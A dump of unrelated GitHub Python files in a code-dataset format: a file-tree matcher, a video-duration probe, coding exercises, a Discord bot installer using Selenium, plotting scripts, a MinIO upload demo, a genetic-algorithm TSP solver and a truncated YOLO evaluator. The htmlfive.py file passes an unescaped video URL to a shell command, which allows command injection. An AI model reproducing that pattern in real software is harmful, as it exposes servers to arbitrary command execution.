def get_identifier_template(\n        self, path: str | Path, templates: list[str], prefix_file_with_parent_directory: bool = True\n    ):\n        for template in templates:\n            if template[2] == \"\":\n                continue\n            if (\n                prefix_file_with_parent_directory\n                and Path(path).is_file()\n                and template[1] is not None\n            ):\n                identifier = f\"{template[1]}/{template[0]}\"\n            else:\n                identifier = f\"{template[0]}\"\n            regex = self.parse_string_to_regex(identifier)\n            actual = (\n                f\"{path.parent.name}/{path.name}\"\n                if prefix_file_with_parent_directory and path.is_file()\n                else path.name\n            )\n            match = re.match(regex, actual)\n            if match is not None and match[0] != \"\":\n                return template[2]\n        return 
path.name\n","repo_name":"neurodatascience/file_tree_check","sub_path":"file_tree_check/identifierEngine.py","file_name":"identifierEngine.py","file_ext":"py","file_size_in_byte":6958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"6367536002","text":"import sys, os, re, signal\nfrom subprocess32 import Popen, PIPE, TimeoutExpired, CalledProcessError\nfrom videos.types.base import VideoType\n\nimport logging\nlogger= logging.getLogger(__name__)\n\ndef getDurationFromStreams(streams):\n # this tries to get around most known cases\n # of duration set with issues in headers\n data = {}\n durations = set()\n index = None\n for line in streams.splitlines():\n index_m = re.match(r\"index=(\\w+)\", line)\n if index_m:\n index = index_m.group(1)\n data[index] = {}\n duration_m = re.match(r\"duration=(\\w+)\", line)\n if duration_m and index:\n duration = duration_m.group(1)\n try:\n data[index][\"duration\"]=int(float(duration))\n except ValueError:\n pass\n codec_m = re.match(r\"codec_name=(\\w+)\", line)\n if codec_m and index:\n codec = codec_m.group(1)\n data[index][\"codec\"]=codec\n codec_type_m = re.match(r\"codec_type=(\\w+)\", line)\n if codec_type_m and index:\n codec_type = codec_type_m.group(1)\n data[index][\"codec_type\"]=codec_type\n frames_m = re.match(r\"nb_frames=(\\w+)\", line)\n if frames_m and index:\n frames = frames_m.group(1)\n try:\n data[index][\"frames\"]=int(frames)\n except:\n pass\n for key, val in data.items():\n if \"duration\" in val and val[\"duration\"] > 0 and \"codec\" in val and val[\"codec\"] != \"unknown\":\n if not (\"frames\" in val and\n \"codec_type\" in val and\n (val[\"codec_type\"] == \"video\") and\n ((val[\"frames\"] / 25 / val[\"duration\"] > 1.1) or (val[\"frames\"] / 25 / val[\"duration\"] < 0.9))):\n durations.add(val[\"duration\"])\n if len(durations) == 1:\n return durations.pop()\n return None\n\nclass HtmlFiveVideoType(VideoType):\n abbreviation = 'H'\n name = 'HTML5'\n\n valid_extensions = set(['ogv', 'ogg', 'mp4', 'm4v', 'webm'])\n\n @classmethod\n def matches_video_url(cls, url):\n return cls.url_extension(url) in cls.valid_extensions\n\n def get_direct_url(self, prefer_audio=False):\n return self.url\n\n def set_values(self, video, user, team, video_url):\n cmd = \"\"\"avprobe -v error -show_format -show_streams \"{}\" 2>&1 \"\"\".format(self.url)\n try:\n with Popen(cmd, shell=True, stdout=PIPE, preexec_fn=os.setsid) as process:\n try:\n streams = process.communicate(timeout=10)[0]\n except TimeoutExpired:\n os.killpg(process.pid, signal.SIGINT) # send signal to the process group\n raise\n duration = getDurationFromStreams(streams)\n video.duration = duration\n except CalledProcessError as e:\n logger.error(\"CalledProcessError error({}) when running command {}\".format(e.returncode, cmd))\n except TimeoutExpired as e:\n logger.error(\"TimeoutExpired error when running command {}\".format(cmd))\n except:\n logger.error(\"Unexpected error({}) when running command {}\".format(sys.exc_info()[0], cmd))\n","repo_name":"jasonboulware/Tardigrades","sub_path":"TestAutomation/project/unisubs/apps/videos/types/htmlfive.py","file_name":"htmlfive.py","file_ext":"py","file_size_in_byte":3218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"37607468952","text":"dr = (-1, 0, 1, 0)\ndc = (0, 1, 0, -1)\n\n\ndef start(depth, v, string: str):\n global possible_nums\n\n if depth == 7:\n possible_nums.append(string)\n return\n\n row = 
v[0]\n col = v[1]\n string += G[row][col]\n\n for d in range(4):\n n_row = row + dr[d]\n n_col = col + dc[d]\n\n if 0 <= n_row < 4 and 0 <= n_col < 4:\n start(depth+1, (n_row, n_col), string)\n\n\nfor tc in range(int(input())):\n G = [tuple(map(str, input().split())) for _ in range(4)]\n\n possible_nums = []\n for r in range(4):\n for c in range(4):\n start(0, (r, c), '')\n\n print('#{} {}'.format(tc+1, len(set(possible_nums))))\n # break\n","repo_name":"HBell11/TIL","sub_path":"algorithm/SWEA/D4/2819_grid_numbering.py","file_name":"2819_grid_numbering.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41424396036","text":"import time\nimport os\nimport selenium\nimport discord\nimport simple_colors\nfrom sys import platform\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\n\n#fa la aplicazione di discord\nglobal drivers\n\ndef installazioneABC():\n\n #controlla o installa le dipendenze\n os.system(\"pip install --upgrade pip\")\n os.system(\"pip install discord\")\n os.system(\"pip install selenium==4.0.0a1\")\n os.system(\"pip install simple_colors==0.1.5\")\n\n nomeBot = input(\"che nome vuoidare al bot? \")\n print()\n print(\"credenziali per discord developer portal:\")\n inputUsername = input(\"metti il tuo username discord: \")\n inputPassword = input(\"metti la tua password discord: \")\n print()\n\n if platform == \"linux\":\n locazioneInstallazione = os.getcwd()\n locazioneDriverS = locazioneInstallazione.split(\"\\\\\")\n locazioneDriverS.remove(\"installazione\")\n locazioneDriverS.append(\"programma\")\n locazioneDriverS.append(\"geckodriver.exe\")\n a = len(locazioneDriverS)\n a = a - 1\n i = 0\n driverL = \"\"\n c = \"\"\n while i < a:\n c = str(locazioneDriverS[i])\n driverL = driverL + c + \"\\\\\"\n i = i + 1\n driverL = driverL + \"geckodriver\"\n driver = webdriver.Firefox(executable_path=driverL)\n os.system(\"clear\")\n elif platform == \"win32\" or platform == \"win64\":\n locazioneInstallazione = os.getcwd()\n locazioneDriverS = locazioneInstallazione.split(\"\\\\\")\n locazioneDriverS.remove(\"installazione\")\n locazioneDriverS.append(\"programma\")\n locazioneDriverS.append(\"geckodriver.exe\")\n a = len(locazioneDriverS)\n a = a - 1\n i = 0\n driverL = \"\"\n c = \"\"\n while i < a:\n c = str(locazioneDriverS[i])\n driverL = driverL + c + \"\\\\\"\n i = i + 1\n driverL = driverL + \"geckodriver.exe\"\n driver = webdriver.Firefox(executable_path=driverL)\n\n driver.get(\"https://discord.com/login?redirect_to=%2Fdevelopers%2Fapplications\")\n\n #login\n input1 = driver.find_element_by_xpath('/html/body/div/div[2]/div/div[2]/div/div/form/div/div/div[1]/div[3]/div[1]/div/div[2]/input')\n input2 = driver.find_element_by_xpath('/html/body/div/div[2]/div/div[2]/div/div/form/div/div/div[1]/div[3]/div[2]/div/input')\n inputInvio = driver.find_element_by_xpath('/html/body/div/div[2]/div/div[2]/div/div/form/div/div/div[1]/div[3]/button[2]')\n\n input1.send_keys(inputUsername)\n input2.send_keys(inputPassword)\n inputInvio.click()\n\n time.sleep(1000)\n #ultimo messaggio\n driver.close()\n print(\"\"\"\ninstallazione finita!\n\nper avviare il tuo bot d'ora in poi ti basterà avviare il file .exe che si è creato nel desktop\n 
\"\"\")\n\ninstallazioneABC()","repo_name":"berta00/multi-function-discord-bot","sub_path":"installazione/installazione.py","file_name":"installazione.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37135002661","text":"import sys, math\n\n\ndef read_testdata(testname):\n    testdata = dict()\n    with open(testname, 'r') as testfile:\n        for line in testfile:\n            items = line.rstrip('\\n').split()\n            row = int(items[0])\n            col = int(items[1])\n            rat = float(items[2])\n            testdata[(row, col)] = rat\n    return testdata\n\ndef write_traindata(inname, outname, testdata):\n    with open(outname, 'w') as outfile:\n        with open(inname, 'r') as infile:\n            for line in infile:\n                items = line.rstrip('\\n').split()\n                row = int(items[0])\n                col = int(items[1])\n                if (row, col) not in testdata:\n                    outfile.write(line)\n    \n#----------------------------------------------------------------\n\nif __name__ == '__main__':\n    testname = 'data/testdata.txt'\n    inname = 'data/sample1m.txt'\n    outname = 'data/train/sample1m.txt'\n\n    testdata = read_testdata(testname)\n    # Completed: actually write the filtered training file (this call was missing).\n    write_traindata(inname, outname, testdata)\n\n    \n","repo_name":"wangxu724/RecommendationSysSpark","sub_path":"itembased/update_training_data.py","file_name":"update_training_data.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9948794730","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.ticker as ticker\n#import random\n\n#data = pd.read_csv('topk100.csv')\ndata = pd.read_csv('IMC10100.csv')\n##固定k=1000,内存从10-100 的性能,最小堆的后50kb画图\n# x = data.iloc[:,0:1]\n# print(set(x))\n\nkeys1=[\"CuckooSketch\",\"CuckooSketchPro\"]\nkeys2=[\"CuckooCounter\",\"heavykeeper\",\"LossyCounting\",\"spacesaving\",\"NI\",\"SAL\"]\nlabels={\"CC\":\"CuckooCounter\",\"CS\":\"CuckooSketch\",\"CSP\":\"CuckooSketchPro\",\"HK\":\"heavykeeper\",\"LC\":\"LossyCounting\",\"SS\":\"spacesaving\",\"NI\":\"NI\",\"SAL\":\"SAL\"}\ntick_size=9\nlabel_size=10\ndefault_colors = [\"#1f77b4\", \"#ff7f0e\", \"#2ca02c\", \"#d62728\", \"#9467bd\", # 使用颜色编码定义颜色\n                  \"#8c564b\", \"#e377c2\", \"#7f7f7f\", \"#bcbd22\", \"#17becf\"]\nzipf=0\nAAE = {}\nARE = {}\nthroughput = {}\nPrecsion = {}\nfor index, row in data.iterrows():\n    key = str(row[1])\n    if key not in AAE:\n        AAE[key] = []\n        ARE[key] = []\n        throughput[key] = []\n        Precsion[key] = []\n    AAE[key].append(row[3])\n    ARE[key].append(row[4])\n    throughput[key].append(row[6])\n    Precsion[key].append(int(row[5].split('/')[1]) - int(row[5].split('/')[0]))\n\noffset = 0.2 # 定义标记之间的偏移量\nmarkers = ['o', '>', '^', 'v', 'X', 'd', 's', '*', 'h', 'H', 'D', 'd', 'P']\nplt.figure(figsize=(6, 4.5))\n\nax1 = plt.subplot(221)\nplt.grid(True, linestyle='--', axis='y')\nplt.grid(True, linestyle='--', axis='x')\ni = 0\nxtick=[]\ndata={}\ndata[\"CuckooCounter\"]=[]\ndata[\"CuckooSketch\"]=[]\ndata[\"CuckooSketchPro\"]=[]\ndata[\"heavykeeper\"]=[]\ndata[\"LossyCounting\"]=[]\ndata[\"spacesaving\"]=[]\nms=5\nmem = [\"10\",\"20\",\"30\",\"40\",\"50\",\"60\",\"70\",\"80\",\"90\",\"100\"]\n#mem = [\"100\",\"200\",\"300\",\"400\",\"500\",\"600\",\"700\",\"800\",\"900\",\"1000\"]\nfor i, (key, value) in enumerate(AAE.items()):\n    if key in keys1: \n        x = np.arange(len(value)) + i * offset # 计算当前折线的横坐标点\n        ax1.plot(x,value, '-o', label=key, marker=markers[i], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n    else:\n        j=5\n        if key in keys2: \n            xx = 
np.arange(len(value)) + j # 计算当前折线的横坐标点\n ax1.plot(xx,value,'-o', label=key, marker=markers[j], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n continue\nplt.title('Top-k=1000', fontweight='bold', fontsize=label_size)\nplt.xticks(range(len(mem)), mem)\nplt.ylabel('AAE', fontweight='bold', fontsize=label_size)\nplt.grid(True, linestyle=':', color='gray')\nplt.xlabel(u'Memory(KB)', fontweight='bold', fontsize=label_size)\nax1.set_ylim(10**-3, 10**3)\nax1.set_yscale('log')\n#plt.tight_layout()\n\ni = 0\nax2 = plt.subplot(222)\nplt.grid(True, linestyle='--', axis='y')\nplt.grid(True, linestyle='--', axis='x')\nfor i, (key, value) in enumerate(ARE.items()):\n if key in keys1: \n x = np.arange(len(value)) + i * offset # 计算当前折线的横坐标点\n ax2.plot(x,value, '-o', label=key, marker=markers[i], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n else:\n j=5\n if key in keys2: \n xy = np.arange(len(value)) + j # 计算当前折线的横坐标点\n ax2.plot(xy,value,'-*', label=key, marker=markers[j], markersize=ms,linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n continue\nplt.title('Top-k=1000',fontweight='bold', fontsize=label_size)\nplt.tight_layout()\nplt.xlabel(u'Memory(KB)', fontweight='bold', fontsize=label_size)\nplt.ylabel('ARE', fontweight='bold', fontsize=label_size)\nplt.xticks(range(len(mem)), mem)\nplt.grid(True, linestyle=':', color='gray')\nax2.set_ylim(10**-5, 10**3)\nax2.set_yscale('log')\n\nax3 = plt.subplot(223)\nplt.grid(True, linestyle='--', axis='y')\nplt.grid(True, linestyle='--', axis='x')\ni = 0\nfor i, (key, value) in enumerate(throughput.items()):\n if key in keys1: \n x = np.arange(len(value)) + i * offset # 计算当前折线的横坐标点\n ax3.plot(x,value, '-o', label=key, marker=markers[i], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n else:\n if key in keys2: \n xx = np.arange(len(value)) + 5 # 计算当前折线的横坐标点\n ax3.plot(xx,value,'-o', label=key, marker=markers[5], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n continue\nplt.ylabel(u'throughput(Mps)', fontweight='bold', fontsize=label_size) \nplt.title(u'Top-k=1000', fontweight='bold', fontsize=label_size) \nplt.xticks(range(len(mem)), mem)\nplt.xlabel(u'Memory(KB)', fontweight='bold', fontsize=label_size)\nplt.grid(True, linestyle=':', color='gray')\n\nax4 = plt.subplot(224)\nplt.grid(True, linestyle='--', axis='y')\nplt.grid(True, linestyle='--', axis='x')\ni = 0\nfor i, (key, value) in enumerate(Precsion.items()):\n if key in keys1: \n x = np.arange(len(value)) + i * offset # 计算当前折线的横坐标点\n ax4.plot(x,value, '-o', label=key, marker=markers[i], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n else:\n if key in keys2: \n xx = np.arange(len(value)) + 5 # 计算当前折线的横坐标点\n ax4.plot(xx,value,'-o', label=key, marker=markers[5], markersize=ms, linestyle='-', alpha=1, linewidth=2, markerfacecolor='none', zorder=105)\n continue\nplt.xticks(range(len(mem)), mem)\nplt.ylabel(u'precision', fontweight='bold', fontsize=label_size) \nplt.title(u'Top-k=1000', fontweight='bold', fontsize=label_size) \nplt.xlabel(u'Memory(KB)', fontweight='bold', fontsize=label_size)\nplt.grid(True, linestyle=':', color='gray')\nplt.legend(labels,bbox_to_anchor=(-0.25,2.6),ncol=8, loc='upper 
center',borderaxespad=0)\nplt.subplots_adjust(wspace=0.4,hspace=0.4,bottom=0.075)\n##子图间距\nplt.show()\n","repo_name":"lotus6969/cuckoosektch","sub_path":"topk100.py","file_name":"topk100.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17770217351","text":"\"\"\"\nFormat the data into *FastText training data format\n\"\"\"\nimport sys\nsys.path.append(\"..\")\nimport config\nimport random\n\ndef addLable (filein_pos, filein_neg, fileout):\n fpos = open(filein_pos, encoding='utf-8', mode='r')\n fneg = open(filein_neg, encoding='utf-8', mode='r')\n fout = open(fileout, encoding='utf-8', mode='w')\n pos_label = \"__label__helpful \"\n neg__label = \"__label__unhelpful \"\n text_list = []\n for line in fpos:\n text_list.append(pos_label+line)\n for line in fneg:\n text_list.append(neg__label+line)\n random.shuffle(text_list)\n for line in text_list:\n fout.write(line)\n\n\nif __name__ == \"__main__\":\n posfile = \"../data/raw/wyppos.txt\"\n negfile = \"../data/raw/wypneg.txt\"\n outfile = \"../data/train/wyp_test.txt\"\n addLable(filein_pos=posfile,\n filein_neg=negfile,\n fileout=outfile)\n","repo_name":"WangYipeng0624/helpfulness_prediction","sub_path":"data_prep/data_format.py","file_name":"data_format.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8925139435","text":"from minio import Minio\nfrom minio.error import S3Error\nimport json\ndef get_cred(path):\n file_path = path\n with open(file_path, 'r') as j:\n data = json.load(j)\n #print(data)\n return data\ndef main():\n bucket_name = \"python-test\"\n minio_cred = get_cred('./minio_cred/credentials.json')\n # minio config\n clinet = Minio(\n minio_cred['url'].split('//')[1],\n access_key = minio_cred['accessKey'],\n secret_key = minio_cred['secretKey'],\n secure = False\n )\n \n found = clinet.bucket_exists(bucket_name)\n if not found:\n bucket_name = \"new-python\"\n clinet.make_bucket(bucket_name)\n \n else:\n print(f\"Bucket {bucket_name} is existed !\")\n \n #create hello.txt\n txt_path = './demo.txt'\n with open(txt_path, 'w') as f:\n f.write('hello minio!')\n \n # put hello.txt\n clinet.fput_object(\n bucket_name, \"demo/here_is_test.txt\", txt_path\n )\n\nif __name__ == \"__main__\":\n #my_json = get_cred('./minio_cred/credentials.json')\n #print(my_json['url'])\n #print(my_json['url'].split('//'))\n #print(\"*\"*40)\n #for k, v in my_json.items():\n # print(f\"key:{k}, value:{v}\")\n try: \n main()\n except S3Error as exc:\n print(\"error occurred.\", exc)","repo_name":"hubertchang417/minio-python","sub_path":"minio_test.py","file_name":"minio_test.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"1977967104","text":"import numpy as np\nimport math\nimport random\nimport matplotlib.pyplot as plt\nimport csv\n\n\ndef CalDis(a, b): # 计算两点之间的距离\n distance = math.sqrt((float(a[1]) - float(b[1])) ** 2 + (float(a[2]) - float(b[2])) ** 2)\n return distance\n\n\ndef CityDis(): # 邻接矩阵:城市间相互距离\n with open('E:\\\\xuexi\\\\二年级\\\\最优化\\\\cities.csv', 'r') as f: # 读入csv文件\n reader = csv.reader(f)\n global locs\n locs = list(reader) # 转成列表类型\n del locs[0] # 去掉表头\n # print(locs)\n\n n = len(locs)\n dis_mat = np.zeros([10, 10])\n for i in range(n - 1):\n for j in range(i + 1, n):\n dist = CalDis(locs[i], locs[j])\n dis_mat[i, j] 
= dist\n\n for i in range(n):\n dis_mat[:, i] = dis_mat[i, :]\n\n return dis_mat\n\n\n# 交叉\ndef Cross(p1, p2):\n a = np.array(p1).copy()\n b = np.array(p2).copy()\n\n # 0~9之间随机生成两个整数,作为映射的起始点和结束点\n begin = random.randint(0, 9)\n end = random.randint(0, 9)\n # 使 begin 小于 end\n if begin > end:\n temp = begin\n begin = end\n end = temp\n\n # print begin,end\n # 建立映射关系\n cross_map = {}\n is_exist = False\n # 初步映射\n for i in range(begin, end + 1):\n if a[i] not in cross_map.keys():\n cross_map[a[i]] = []\n if b[i] not in cross_map.keys():\n cross_map[b[i]] = []\n\n cross_map[a[i]].append(b[i])\n cross_map[b[i]].append(a[i])\n\n # 计算子串中元素出现的个数,个数为2,则该元素为传递的中间结点,如如1:[6],6:[3,1],‘6’出现的次数为2\n appear_times = {}\n for i in range(begin, end + 1):\n if a[i] not in appear_times.keys():\n appear_times[a[i]] = 0\n if b[i] not in appear_times.keys():\n appear_times[b[i]] = 0\n\n appear_times[a[i]] += 1\n appear_times[b[i]] += 1\n\n if a[i] == b[i]:\n appear_times[a[i]] -= 1\n\n for k, v in appear_times.items():\n if v == 2:\n values = cross_map[k]\n for key in values:\n cross_map[key].extend(values)\n cross_map[key].append(k)\n cross_map[key].remove(key)\n cross_map[key] = list(set(cross_map[key]))\n\n # 使用映射关系交叉\n # 先映射选中的子串\n temp = a[begin:end + 1].copy()\n a[begin:end + 1] = b[begin:end + 1]\n b[begin:end + 1] = temp\n\n # 根据映射规则映射剩下的子串\n seg_a = a[begin:end + 1]\n seg_b = b[begin:end + 1]\n\n remain = list(range(begin))\n remain.extend(range(end + 1, len(a)))\n\n for i in remain:\n keys = cross_map.keys()\n if a[i] in keys:\n for fi in cross_map[a[i]]:\n if fi not in seg_a:\n a[i] = fi\n break\n\n if b[i] in keys:\n for fi in cross_map[b[i]]:\n if fi not in seg_b:\n b[i] = fi\n break\n\n return a, b\n\n\n# 变异\ndef Variation(s):\n c = range(10)\n index1, index2 = random.sample(c, 2)\n temp = s[index1]\n s[index1] = s[index2]\n s[index2] = temp\n return s\n\n\n# 计算总路程,根据路程计算适应度\ndef total_dis(s):\n citydis = CityDis()\n n = len(s)\n dis = 0\n for i in range(n):\n dis += citydis[s[i], s[(i + 1) % n]]\n return -dis\n\n\n# 获取列表的第三个元素\ndef TakeThird(elem): # 按适应度从大到小,排序时作为sort的key参数\n return elem[2]\n\n\ndef CacAdap(population): # adap n*4,n为行数,每行包括:个体下标,适应度,选择概率,累积概率\n\n # 计算每一个个体的适应度,选择概率\n adap = []\n psum = 0\n # 计算适应度\n i = 0\n for p in population:\n icost = np.exp(total_dis(p)) # e^(-x)\n psum += icost\n # 添加个体下标\n adap.append([i])\n # 添加适应度\n adap[i].append(icost)\n i += 1\n # 计算选择概率\n for p in adap:\n # 添加选择概率和累积概率,这里累积概率暂时等于选择概率,后面会重新计算赋值\n p.append(p[1] / psum)\n p.append(p[2])\n\n # 根据适应度从大到小排序\n adap.sort(key=TakeThird, reverse=True)\n # 计算累计概率\n n = len(adap)\n for i in range(1, n):\n p = adap[i][3] + adap[i - 1][3]\n adap[i][3] = p\n\n return adap\n\n\ndef Chose(adap): # 轮盘选择\n\n chose = []\n # 选择次数\n epochs = 20\n n = len(adap)\n for a in range(epochs):\n p = random.random()\n if adap[0][3] >= p:\n chose.append(adap[0][0])\n else:\n for i in range(1, n):\n if adap[i][3] >= p and adap[i - 1][3] < p:\n chose.append(adap[i][0])\n break\n\n chose = list((chose))\n return chose\n\n\ndef Cross_Variation(chose, population): # 交叉变异\n\n # 交叉率\n p_c = 0.7\n # 变异率\n p_m = 0.3\n # 交叉变异操作\n chose_num = len(chose)\n sample_times = chose_num // 2\n for i in range(sample_times):\n index1, index2 = random.sample(chose, 2)\n # print index1,index2\n # 参与交叉的父结点\n parent1 = population[index1]\n parent2 = population[index2]\n # 这两个父结点已经交叉,后面就不要参与了,就像这两个人以及结婚,按规矩不能在与其他人结婚了,故从采样样本中移除\n chose.remove(index1)\n chose.remove(index2)\n\n p = random.random()\n if p_c >= p:\n child1, child2 = Cross(parent1, parent2)\n # 
print child1,child2\n p1 = random.random()\n p2 = random.random()\n if p_m > p1:\n child1 = Variation(child1)\n if p_m > p2:\n child2 = Variation(child2)\n population.append(list(child1))\n population.append(list(child2))\n return population\n\n\ndef GA(population): # 1次遗传过程\n\n adap = CacAdap(population)\n # 选择操作\n chose = Chose(adap)\n # 交叉变异\n population = Cross_Variation(chose, population)\n\n return population\n\n\n# 循环调用遗传算法,直到达到终止条件\ndef find_min(population):\n distance = []\n # 遗传次数\n epochs = 51\n i = 0\n x_final = []\n y_final = []\n while i < epochs:\n adap = []\n # 计算适应度\n for p in population:\n icost = total_dis(p)\n adap.append(icost)\n\n # 使用遗传算法更新种群\n population = GA(population)\n\n min_cost = max(adap)\n print('epoch %d: distance=%.2f' % (i, -min_cost))\n distance.append([i, -min_cost])\n i += 1\n BestPath = []\n if i == epochs:\n # 输出最优解\n p_len = len(population)\n for index in range(p_len):\n if adap[index] == min_cost:\n print('最优路径:')\n # print(population[index])\n cities = []\n for pos in population[index]:\n BestPath.append(pos)\n cities.append(locs[pos][0])\n x_final.append(locs[pos][1])\n y_final.append(locs[pos][2])\n print(cities)\n print('最短距离:')\n print(-min_cost)\n break\n # 打印损失函数变换\n distance = np.array(distance)\n plt.subplot(1, 2, 1)\n x_final = [float(x) for x in x_final]\n y_final = [float(x) for x in y_final]\n x_final.append(x_final[0])\n y_final.append(y_final[0])\n plt.plot(x_final, y_final, '*-')\n plt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签\n for i in range(len(BestPath)): # 标记端点\n plt.text(float(locs[BestPath[i]][1]), float(locs[BestPath[i]][2]), locs[BestPath[i]][0])\n plt.subplot(1, 2, 2)\n plt.plot(distance[:, 0], distance[:, 1])\n plt.title('GA')\n plt.show()\n\n\n# 初始化\ns1 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]\ns2 = [8, 5, 9, 1, 3, 4, 6, 0, 2, 7]\n\npopulation = [s1, s2]\n# 调用\nfind_min(population)\n","repo_name":"weiyongsen/optimization","sub_path":"Gene_TSP.py","file_name":"Gene_TSP.py","file_ext":"py","file_size_in_byte":8253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39198291979","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 10 12:41:42 2019\r\n\r\n@author: Chaobo\r\n\"\"\"\r\n\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport os\r\nimport cv2\r\nimport yolo.config as cfg\r\nimport time\r\nimport pickle as cPickle\r\nimport skimage.draw\r\nfrom yolo.yolo3_net_pos import YOLONet\r\nfrom utils.voc_eval_mask import voc_eval\r\n\r\nclass MAP(object):\r\n \r\n def __init__(self, test_path, evaluation=True):\r\n self.num_class = len(cfg.CLASSES)\r\n self.classid = [i for i in range(self.num_class)]\r\n self.class_to_ind = dict(zip(cfg.CLASSES, range(self.num_class)))\r\n self.test_path = test_path\r\n self.imagesetfile = os.path.join(self.test_path, 'cache', 'test.txt')\r\n if evaluation: \r\n self.groundtruth = self.get_groundtruth()\r\n\r\n def get_groundtruth(self):\r\n cache_path = cache_path = os.path.join(self.test_path, 'cache')\r\n \r\n test_labels_cache = os.path.join(cache_path, 'gt_labels_' + 'test' + '.pkl')\r\n if os.path.isfile(test_labels_cache):\r\n print('Loading testing labels from: ' + test_labels_cache)\r\n with open(test_labels_cache, 'rb') as f:\r\n recs = cPickle.load(f)\r\n print('Number of testing data: ' +str(len(recs[0])))\r\n return recs \r\n\r\n ground_truth_cache = os.path.join(cache_path, 'ground_truth_cache.pkl')\r\n print('Processing testing labels from: ' + ground_truth_cache)\r\n with 
open(ground_truth_cache, 'rb') as f:\r\n annotations = cPickle.load(f)\r\n \r\n # annotations. Skip unannotated images.\r\n annotations = [a for a in annotations if a['regions']]\r\n \r\n with open(self.imagesetfile, 'r') as f:\r\n test_index = [x.strip() for x in f.readlines()] \r\n assert len(test_index)==len(annotations)\r\n \r\n recs_mask = {}\r\n recs_mergemask = {}\r\n recs_size = {}\r\n for i, index in enumerate(test_index):\r\n a = annotations[i]\r\n filename = os.path.splitext(a['filename'])[0]\r\n assert filename == index\r\n \r\n polygons = [r['shape_attributes'] for r in a['regions'].values()]\r\n class_names = [r['region_attributes'] for r in a['regions'].values()]\r\n\r\n # return a list[{'imageid':filename, 'classid':classid, 'difficult':int(0), 'mask':bool[image_h, image_w]]}]\r\n image_h, image_w = a['size']\r\n mask_label, merged_mask = self.load_masklabel(filename, image_h, image_w, polygons, class_names)\r\n \r\n recs_mask[index] = mask_label\r\n recs_mergemask[index] = merged_mask\r\n recs_size[index] = [image_h, image_w]\r\n \r\n recs = [recs_mask, recs_mergemask, recs_size, test_index]\r\n\r\n print('Saving testing labels to: ' + test_labels_cache)\r\n with open(test_labels_cache, 'wb') as f:\r\n cPickle.dump(recs, f)\r\n print('Number of testing data: ' +str(len(recs_mask)))\r\n return recs\r\n\r\n def load_masklabel(self, imname, image_h, image_w, polygons, class_names):\r\n\r\n mask = np.zeros([len(polygons), image_h, image_w], dtype=np.bool)\r\n merged_annotatemask = np.zeros((image_h, image_w), dtype=np.uint8)\r\n \r\n for i, each_instance in enumerate(polygons):\r\n each_mask = np.zeros([image_h, image_w], dtype=np.bool)\r\n for each_poly in each_instance:\r\n subtype = each_poly['type']\r\n x_points = each_poly['all_points_x']\r\n y_points = each_poly['all_points_y']\r\n rr, cc = skimage.draw.polygon(y_points, x_points)\r\n if subtype == 'out': \r\n each_mask[rr, cc] = True\r\n each_mask[np.array(y_points), np.array(x_points)] = True\r\n else:\r\n each_mask[rr, cc] = False\r\n each_mask[np.array(y_points), np.array(x_points)] = True\r\n \r\n mask[i, :,:] = each_mask\r\n\r\n # generate merged mask for computing mIoU\r\n if class_names[i] == 'crack':\r\n merged_annotatemask[mask[i,...]==True] = 1\r\n elif class_names[i] == 'spall':\r\n merged_annotatemask[mask[i,...]==True] = 2\r\n elif class_names[i] == 'rebar':\r\n merged_annotatemask[mask[i,...]==True] = 3 \r\n\r\n # generate masklabel for computing mask-level mAP\r\n mask_index = np.where(np.any(mask, axis= (1,2)))[0]\r\n assert len(mask_index)==len(class_names)\r\n masklabel = []\r\n for index in mask_index:\r\n eachclass = class_names[index]\r\n classid = self.class_to_ind[eachclass]\r\n eachmask = mask[index,...]\r\n masklabel.append({'imageid': imname, 'classid': classid, 'difficult': int(0), 'mask': eachmask})\r\n \r\n return masklabel, merged_annotatemask\r\n\r\n def correct_yolo_boxes(self, x1, y1, x2, y2, image_h, image_w, net_h, net_w):\r\n\r\n if (float(net_w)/image_w) < (float(net_h)/image_h):\r\n new_w = net_w\r\n new_h = (image_h*net_w)//image_w\r\n else:\r\n new_h = net_h\r\n new_w = (image_w*net_h)//image_h\r\n \r\n x_offset, x_scale = float((net_w - new_w)//2)/net_w, float(new_w)/net_w\r\n y_offset, y_scale = float((net_h - new_h)//2)/net_h, float(new_h)/net_h\r\n \r\n x1 = max(min(np.around((x1 - x_offset) / x_scale * image_w).astype(np.int32), image_w), 0)\r\n x2 = max(min(np.around((x2 - x_offset) / x_scale * image_w).astype(np.int32), image_w), 0)\r\n y1 